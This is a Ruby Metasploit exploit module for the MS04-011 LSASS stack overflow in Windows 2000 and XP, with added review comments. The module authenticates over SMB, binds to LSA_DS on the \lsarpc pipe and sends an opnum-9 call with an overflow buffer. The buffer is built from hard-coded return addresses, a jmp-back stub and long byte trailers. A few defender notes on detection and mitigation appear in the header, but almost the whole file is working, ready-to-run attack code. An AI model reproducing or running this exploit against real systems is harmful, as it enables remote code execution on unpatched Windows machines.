require 'msf/core'
module Msf
class Exploits::Windows::MS04_011_LSASS < Msf::Exploit::Remote

  #
  # This module exploits a vulnerability in the LSASS service
  #
  # Metasploit exploit module for MS04-011 (the LSASS stack overflow that the
  # Description credits to eEye). It reaches LSASS over SMB: session setup,
  # open of the \lsarpc named pipe, DCERPC bind to 'LSA_DS', then a single
  # opnum-9 call carrying the overflow buffer (see #exploit).
  #
  # Defender notes, all derived from this file:
  #   * Mitigation: the MS04-011 bulletin listed under References.
  #   * Detection: the on-the-wire sequence is SMB login -> open \lsarpc ->
  #     bind LSA_DS -> one multi-kilobyte opnum 9 request; the bind/opnum pair
  #     on that pipe is the observable signature.
  #   * Target selection in #exploit is driven by the SMB peer OS string, not
  #     by the user-selected target; only 'Windows 2000 English' and
  #     'Windows XP English' return addresses are hard-coded below.
  #

  include Exploit::Remote::DCERPC
  include Exploit::Remote::SMB

  # Registers the module's metadata with the framework through update_info.
  #
  # @param info [Hash] metadata passed in by the framework; merged by update_info
  #
  # NOTE(review): 'MSO4-011' in Name uses the letter O where the bulletin id in
  # References is MS04-011 with a zero; 'Targetting' and the doubled "need need"
  # in Description are typos too. They are runtime strings and are left as-is.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft LSASS MSO4-011 Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in the LSASS service, this vulnerability
        was originally found by eEye. When re-exploiting a Windows XP system, you will need
        need to run this module twice. DCERPC request fragmentation can be performed by setting
        'FragSize' parameter.
      },
      'Author'         => [ 'hdm' ],
      # '$Revision$' is an SVN keyword placeholder; it is not expanded by Ruby.
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'OSVDB', '5248' ],
          [ 'MSB', 'MS04-011' ],
          [ 'MIL', '36' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          # Space caps the encoded payload at 1024 bytes; #exploit writes it at
          # fixed offsets and relies on this cap to stay inside its buffers.
          'Space'    => 1024,
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
          'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",
        },
      # NOTE(review): #exploit indexes this array by position (targets[1] for
      # Windows 2000, targets[2] for Windows XP); reordering these entries
      # silently breaks those lookups.
      'Targets'        =>
        [
          # Automatic
          # Rets is empty here on purpose: the automatic entry carries no
          # address, #exploit chooses a layout from the peer OS string instead.
          [
            'Automatic Targetting',
            {
              'Platform' => 'win',
              'Rets'     => [ ],
            },
          ],

          # Windows 2000
          [
            'Windows 2000 English',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x773242e0 ],
            },
          ],

          # Windows XP
          [
            'Windows XP English',
            {
              'Platform' => 'win',
              'Rets'     => [ 0x7449bf1a ],
            },
          ],
        ],
      'DefaultTarget'  => 0))
  end

  # Runs the module against the configured host.
  #
  # Flow: connect -> smb_login -> choose a buffer layout from the peer OS string
  # (smb_peer_lm) -> open \lsarpc -> bind LSA_DS -> opnum 9 call -> handler.
  # There is no explicit return value and no disconnect in this method;
  # presumably the framework's cleanup closes the connection — confirm.
  #
  # NOTE(review): the user-selected `target` is never read here; the
  # `case os` below decides everything and indexes targets[] by position.
  def exploit

    #
    # Connect to the remote SMB service
    #
    print_status("Connecting to the target system...")
    connect

    #
    # Request a session, authenticate, and connect to IPC$
    #
    smb_login

    #
    # Check the remote OS name and version
    #
    os = smb_peer_lm
    # Stays '' unless one of the case arms below assigns a buffer.
    over =''

    case os

    # Windows 2000 requires that the string be unicode formatted
    # and give us a nice set of registers which point back to
    # the un-unicoded data. We simply return to a nop sled that
    # jumps over the return address, some trash, and into the
    # final payload. Easy as pie.
    when /2000/
      str = Rex::Text.rand_text_alphanumeric(3500)
      # targets[1] is the 'Windows 2000 English' entry; pack('V') emits the
      # address as a 32-bit little-endian value.
      str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
      str[2104, payload.encoded.length ] = payload.encoded
      # `unicode` comes from an included mixin (not defined in this file);
      # `self.` is used inconsistently on these three calls — style only.
      over = self.make_lsass_stub_beg + self.unicode(str) + make_lsass_stub_end

    # Windows XP is a bit different, we need to use an ascii
    # buffer and a jmp esp. The esp register points to an
    # eight byte segment at the end of our buffer in memory,
    # we make these bytes jump back to the beginning of the
    # buffer, giving us about 1936 bytes of space for a
    # payload.
    when /XP/
      str = Rex::Text.rand_text_alphanumeric(7000)
      str[0, payload.encoded.length ] = payload.encoded
      # targets[2] is the 'Windows XP English' entry.
      str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
      str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
      over = self.make_lsass_stub_beg + str + make_lsass_stub_end

    # NOTE(review): a bare `when` takes the expression on the next line as its
    # pattern, so this arm parses as `when print_status(...)` with `return` as
    # its body. Unless print_status happens to return something that `===` the
    # os string, an unrecognised OS prints the message and then falls through
    # to the bind/call below with `over` still ''. `else` was presumably
    # intended here.
    when
      print_status("No target is available for #{ os }")
      return
    end

    #
    # Open the lsarpc named pipe
    #
    # Single-quoted, so the backslash is a literal character in the pipe name.
    fid = smb_create('\lsarpc')

    #
    # Bind to LSASS over the LSARPC pipe
    #
    smb_dcerpc_bind(fid, 'LSA_DS')

    #
    # Send the malicious DCERPC request
    #
    # Opnum 9 on the LSA_DS binding; `over` is the buffer assembled above.
    smb_dcerpc_call(fid, 9, over)

    #
    # Perform any required client-side payload handling
    #
    handler

  end

  # Fixed 12-byte prefix placed before the per-target buffer in #exploit.
  # Treat it as an opaque constant — presumably request framing for the
  # LSARPC call, not decoded here.
  #
  # @return [String] the 12 prefix bytes
  def make_lsass_stub_beg
    "\xad\x0d\x00\x00\x00\x00\x00\x00\xad\x0d\x00\x00"
  end

  # Fixed trailer appended after the per-target buffer in #exploit.
  #
  # Opaque constant assembled by string concatenation (each trailing `+`
  # continues the expression onto the next line). Every byte is significant,
  # so do not reflow or hand-edit. The roughly 1.2 KB string is rebuilt on
  # every call; a frozen constant would avoid that, but the method contract
  # is kept as-is here.
  #
  # @return [String] the trailer bytes
  def make_lsass_stub_end
    "\x00\x00\x00\x00\x50\x6a\x40\x00\x01\x00\x00\x00"+
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
    "\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x50\x6a\x40\x00"+
    "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00"+
    "\x50\x6a\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
    "\x00\x00\x00\x00\x50\x6a\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00"+
    "\x01\x00\x00\x00\x00\x00\x00\x00\x50\x80\x23\x00\xdf\xaf\xff\x33"+
    "\x9b\x78\x70\x43\xc5\x0a\x4d\x98\x96\x02\x64\x92\xc1\xee\x70\x32"+
    "\x65\xc1\xef\x7b\xd6\xaa\xd6\x09\x21\xf6\xe7\xd1\x4c\xdf\x6a\x2d"+
    "\x0a\xfb\x43\xea\xda\x07\x24\x84\x88\x52\x9e\xa8\xa1\x7f\x4b\x60"+
    "\xec\x94\x57\x33\x06\x93\x92\x25\xd6\xac\xdc\x89\x68\x5e\xbb\x32"+
    "\x2b\x17\x68\xf2\x06\xb7\x86\xac\x81\xfe\x52\x27\xf5\x80\x11\x0d"+
    "\x4e\x2e\x1b\xa3\x44\x8a\x58\xed\xf3\x9c\xe9\x31\x01\x72\xa6\xab"+
    "\xfa\xa8\x05\x00\x37\x60\x6b\x81\xef\xf4\x96\x9a\xf7\x67\x95\x27"+
    "\x7a\x25\xef\x6f\x0e\xff\x2d\x15\x7f\x23\x1c\xa7\x56\x94\x4a\x18"+
    "\x98\xc6\xd8\xd2\x29\x5b\x57\xb8\x5d\x3a\x93\x58\x45\x77\x36\xe3"+
    "\xd1\x36\x87\xff\xe3\x94\x0f\x00\xe6\x7c\x1a\x92\xc1\x5f\x40\xc3"+
    "\xa3\x25\xce\xd4\xaf\x39\xeb\x17\xcf\x22\x43\xd9\x0c\xce\x37\x86"+
    "\x46\x54\xd6\xce\x00\x30\x36\xae\xf9\xb5\x2b\x11\xa0\xfe\xa3\x4b"+
    "\x2e\x05\xbe\x54\xa9\xd8\xa5\x76\x83\x5b\x63\x01\x1c\xd4\x56\x72"+
    "\xcd\xdc\x4a\x1d\x77\xda\x8a\x9e\xba\xcb\x6c\xe8\x19\x5d\x68\xef"+
    "\x8e\xbc\x6a\x05\x53\x0b\xc7\xc5\x96\x84\x04\xd9\xda\x4c\x42\x31"+
    "\xd9\xbd\x99\x06\xf7\xa3\x0a\x19\x49\x07\x77\xf0\xdb\x7c\x43\xfa"+
    "\xb2\xad\xb0\xfa\x87\x52\xba\xc9\x94\x61\xdc\xcf\x16\xac\x0f\x4a"+
    "\xa3\x6b\x5b\x6e\x27\x86\x1f\xfe\x4d\x28\x3a\xa5\x10\x54\x6d\xed"+
    "\x53\xf9\x73\xc6\x6e\xa8\xc0\x97\xcf\x56\x3b\x61\xdf\xab\x83\x18"+
    "\xe8\x09\xee\x6a\xb7\xf5\xc9\x62\x55\x2d\xc7\x0c\x0d\xa0\x22\xd8"+
    "\xd4\xd6\xb2\x12\x21\xd7\x73\x3e\x41\xb0\x5c\xd4\xcf\x98\xf3\x70"+
    "\xe6\x08\xe6\x2a\x4f\x24\x85\xe8\x74\xa8\x41\x5f\x0e\xfd\xf1\xf3"+
    "\xbe\x9b\x14\xfd\xc0\x73\x11\xff\xa5\x5b\x06\x34\xc3\x6c\x28\x42"+
    "\x07\xfe\x8a\xa5\xbe\x72\x7a\xf7\xfa\x25\xec\x35\x5e\x98\x71\x50"+
    "\x60\x35\x76\x53\x40\x1a\x34\xa5\x99\x09\xa2\xc6\xca\xa5\xce\x08"+
    "\x50\x45\xab\x8d\xfb\xe3\xb8\xe4\x8a\x61\x48\x14\x6e\xf7\x58\x71"+
    "\xe5\x2e\xbc\x12\xd1\x25\xe9\x65\x7a\xa1\x27\xbe\x3b\x8b\xe8\xe7"+
    "\xbc\xe1\x05\xe7\x92\xeb\xb9\xdf\x5d\x53\x74\xc0\x63\x97\x80\xb8"+
    "\x3c\xae\xf3\xf2\x09\x12\x81\x6c\x69\x10\x6f\xf6\xbe\x03\x7b\x88"+
    "\xcf\x26\x6b\x51\x06\x23\x68\x03\xa1\xb7\xd3\x0c\xca\xbf\x29\x01"+
    "\xa9\x61\x34\x75\x98\x1e\x05\x59\xb3\x46\x44\xff\x2b\x98\x04\x88"+
    "\x89\xfd\x7f\xd5\x19\x8a\xa6\xf3\xd9\x44\xd5\xf9\x3a\x3c\xec\xd9"+
    "\x9b\x8c\x93\x93\x2b\x44\x86\x8b\x80\x83\x23\x00\xdf\xaf\xff\x33"+
    "\x9b\x78\x70\x43\xf1\x55\x87\xb1\xa1\xb3\x8e\x79\x02\x70\x82\x6c"+
    "\x0b\xc1\xef\x96\xf1\xef\xdd\xa2\x69\x86\xc7\x85\x09\x7e\xf0\x2f"+
    "\x8e\xa0\x5f\xea\x39\x2e\x24\xf0\x82\x30\x26\xa8\xa1\x4f\xc6\x5c"+
    "\xec\x94\x87\x52\x9b\x93\x92\xf3\xa3\x1b\xc7\x8f\x9e\xb3\xbb\x32"+
    "\x2b\x17\x54\xf2\x06\x0c\x86\x92\x0f\xb8\xe0\x27\x50\xaa\xeb\xf5"+
    "\x4e\x2b\x1b\xb2\x44\xe6\x58\x02\xd7\x65\xdc\x31\x01\xec\xa6\xab"+
    "\xfa\xa8\x05\x00\x37\x60\x4f\xa1\x3c\x4f\x7a\x9a\x10\x67\x95\xc2"+
    "\x5b\x25\xef\x76\x0e\xff\x2d\x15\x7f\x23\x1c\x77\x56\x94\x4a\x18"+
    "\x98\xc6\xd8\xd2\x29\x44\x57\xb8\x40\x3a\x93\x58\x45\x77\x36\x36"+
    "\x07\x35\x2a\xff\x00\x94\x5c\x80\xe6\x7c\x1a\x92\xc1\x5f\x40\xc3"+
    "\xbc\xf8\xce\x05\x77\x39\x40\x17\xcf\x63\x43\x77\x27\xce\x37\x86"+
    "\x46\x54\xd6\xce\x00\x30\x36\xae\x9f\x24\x2b\x5a\xa0\xfe\xa3\x4b"+
    "\x2e\x7e\xf7\x54\xa9\xd8\xa5\x76\x83\x7b\x63\x01\x1c\xd4\x56\x17"+
    "\x02\xdc\x4a\x89\x77\xda\x8f\x9e\xba\xcb\x37\xe8\x19\x5d\x68\x38"+
    "\x8e\xbc\x6a\x05\x53\x0b\xc7\xc5\x96\x84\x5a\xd9\x6d\x4c\x42\x31"+
    "\xd9\xf2\x99\x06\xf7\x0c\x99\xbe\x49\x07\x77\xf0\x8b\x7c\x43\xfa"+
    "\xb2\xad\xb0\xfa\x87\x52\xba\xc9\x94\x61\xdc\xcf\x16\xac\x0f\x4a"+
    "\xa3\x6b\x5b\x6e\x27\x86\x1f\xfe\x4d\x28\x3a\xa5\x10\x98\x6d\xed"+
    "\x53\xf9\x73\xc6\xa5\xa8\xf7\x66\xcf\x56\x3b\x61\xdf\xab\x83\x18"+
    "\xe8\x09\xee\x6a\xb7\xf5\xc9\x62\x55\x2d\xc7\x0c\x0d\xa0\x22\xd8"+
    "\xd4\xd6\xb2\x12\x21\xd7\x73\x3e\x41\xb0\x5c\xd4\xcf\x98\xf3\x70"+
    "\xe6\x08\xe6\x2a\x4f\x92\x85\xe8\x74\xa8\x41\x5f\x0e\xfd\xf1\xf3"+
    "\xbe\x9b\x14\xfd\xc0\x73\x11\xff\xa5\x5b\x06\x34\xc3\x5d\x28\x42"+
    "\x34\xfe\x8a\xa5\xbe\x72\x7a\xf7\xfa\x25\x2b\x35\x5e\x98\x71\x50"+
    "\x2c\x35\x76\x53\x4e\x1a\x34\xa5\x99\x09\xa2\xc6\xca\xa5\xce\x08"+
    "\x50\x45\xab\x8d\xfb\xe3\xb8\xe4\x8a\x61\x48\x14\x6e\xf7\x58\x71"+
    "\xe5\x2e\xbc\x12\xd1\x25\xe9\x65\x7a\xa1\x27\xbe\x3b\x8b\xe8\xe7"+
    "\xbc\x77\x05\xe7\x92\xeb\xb9\xdf\x5d\x53\x74\xc0\x63\x97\x80\xb8"+
    "\x3c\xae\xf3\xf2\x09\x12\x81\x6c\x69\x10\x6f\xf6\xbe\x03\x7b\x88"+
    "\xcf\x26\x6b\x51\x06\x23\x68\x03\xa1\xb7\xd3\x0c\xca\xbf\x29\x01"+
    "\xa9\x61\x34\x75\x98\x1e\x6f\x59\xb3\x46\x44\xff\x2b\x98\x04\x88"+
    "\x89\xfd\x1c\xd5\x19\x8a\xa6\xf3\xd9\x44\xd5\xf9\x79\x26\x46\xf7"+
    "\xbf\xa1\x12\x73\x23\x44\x86\x8b\x50\x6a\x40\x00"
  end

end
end